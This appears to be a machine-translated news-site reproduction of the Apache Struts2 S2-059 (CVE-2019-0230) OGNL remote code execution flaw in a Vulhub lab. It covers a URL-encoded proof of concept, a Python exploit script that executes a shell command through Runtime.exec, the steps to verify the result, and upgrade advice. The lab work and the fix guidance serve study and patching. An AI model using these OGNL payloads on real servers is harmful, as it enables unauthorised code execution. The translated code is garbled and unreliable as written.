Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Analysis on the recurrence of remote Code execution vulnerability in Apache Struts2 059

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

Apache Struts2 059 remote code execution vulnerability recurrence example analysis, in view of this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

Brief introduction of 0x00 vulnerability

On August 13, 2020, Apache officially issued a risk notice for the Struts2 remote code execution vulnerability, the vulnerability number is CVE-2019-0230, vulnerability level: high risk, vulnerability score: 8.5

The main reason for the vulnerability is that the Apache Struts framework performs secondary ognl parsing of attribute values assigned to certain tag attributes (such as id) when enforced. An attacker can construct a malicious OGNL expression and set it to be modified by external input and execute the attribute value of the Struts2 tag of the OGNL expression, causing OGNL expression parsing, resulting in the impact of remote code execution.

0x01 affects version

Apache Struts2:2.0.0-2.5.20

Recurrence of 0x02 vulnerabilities

Virtual machine deployment docker installation Vulhub one click to build vulnerability test range environment.

Docker-compose up-d

1. Access the vulnerability environment

2. POC verification. The poc:% {yun*zui} of the ognl expression is passed in. URL encoding is required here.

Http://192.168.60.131:8080/?id=%25%7Byun*zui%7D

From the test results, you can see that the id property returns the result of yun*zui.

3. Simple python script for vulnerability exploitation

Import requestsurl = "http://192.168.60.131:8080"data1 = {" id ":"% {(# context=#attr ['struts.valueStack'] .context). (# container=#context [' com.opensymphony.xwork2.ActionContext.container']). (# ognlUtil=#container.getInstance (@ com.opensymphony.xwork2.ognl.OgnlUtil@class)). (# ognlUtil.setExcludedClasses (')). (# ognlUtil.setExcludedPackageNames ('))} "} data2 = {" id ": "% {(# context=#attr ['struts.valueStack'] .context). (# context.setMemberAccess (@ ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)). (@ java.lang.Runtime@getRuntime () .exec (' touch / tmp/yunzui'))}"} res1 = requests.post (url) Data=data1) # print (res1.text) res2 = requests.post (url, data=data2) # print (res2.text)

After running the script, the touch / tmp/yunzui command will be executed remotely

4. Enter the docker to view the execution result of the command and execute it successfully.

Docker-compose exec struts2 bash

Ls-al / tmp

0x03 repair recommendation

Upgrade to Struts 2.5.22 or later

Or turn on ONGL expression injection protection

This is the answer to the analysis of Apache Struts2 059 remote code execution vulnerability recurrence examples. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report